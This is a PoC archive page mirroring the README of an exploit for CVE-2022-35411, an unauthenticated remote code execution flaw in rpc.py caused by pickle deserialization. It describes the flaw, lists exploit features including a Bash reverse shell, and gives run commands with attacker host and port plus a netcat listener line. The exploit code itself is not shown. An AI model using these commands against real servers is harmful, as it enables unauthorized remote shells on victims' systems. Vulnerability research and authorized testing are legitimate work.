Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-35411 PoC — rpc.py 代码问题漏洞

Source
https://github.com/CSpanias/rpc-rce.py
Associated Vulnerability
Title:rpc.py 代码问题漏洞 (CVE-2022-35411)
Description:rpc.py through 0.6.0 allows Remote Code Execution because an unpickle occurs when the "serializer: pickle" HTTP header is sent. In other words, although JSON (not Pickle) is the default data format, an unauthenticated client can cause the data to be processed with unpickle.
Description
Exploit for CVE-2022-35411 — Unauthenticated RCE in rpc.py (<= 0.6.0)
Readme
# rpc.py RCE Exploit (CVE-2022-35411)

This is an updated and improved exploit for **CVE-2022-35411**, targeting vulnerable versions of [rpc.py](https://github.com/abersheeran/rpc.py) (`<= 0.6.0`).  
It allows **unauthenticated remote code execution (RCE)** via Python `pickle` deserialization.

> **Original exploit by**: [Elias Hohl](https://github.com/eliashohl)  
> **Enhanced by**: [x7331](https://github.com/x7331) for usability, portability, and automation

---

## Vulnerability Summary

The vulnerability lies in rpc.py's unsafe usage of Python's `pickle` module, allowing crafted payloads to execute arbitrary commands **without authentication**.

- **CVE ID**: [CVE-2022-35411](https://nvd.nist.gov/vuln/detail/CVE-2022-35411)
- **Affected Versions**: rpc.py `v0.4.2` – `v0.6.0`
- **Exploit Type**: Unauthenticated Remote Code Execution (RCE)

---

## Changes

- ✅ Switched to `argparse` with `--lhost`, `--lport`, `--target`, and `--dry-run` flags
- ✅ Clean, modular code structure
- ✅ Optional reverse shell delivery (TCP Bash)
- ✅ Curl test payload (safe mode)
- ✅ Logging support and cleaner output
- ✅ Proper usage guidance via `-h` / `--help`
- ✅ Metadata and inline comments for clarity

---

## Usage

### Reverse Shell Example
```bash
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001
```
### Dry Run (no shell, just curl test)
```bash
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --dry-run
```
### Custom Target (optional)
```bash
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --target http://victim.internal:65432/sayhi
```
## Requirements
- Python `3.x`
- `requests` library (install with pip install requests)
- A listener on your LHOST (e.g., `nc -lvnp 9001`)
- Vulnerable rpc.py server running

## Legal & Ethical Notice
This exploit is provided for educational and authorized testing purposes only.
Do NOT use it on systems you do not own or lack explicit permission to test.
File Snapshot

 [4.0K]  /data/pocs/431929b4b2c3265ebdbb5a1273a5d6c7bdb0d331
├── [1.9K]  README.md
└── [2.8K]  rpc-rce.py

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →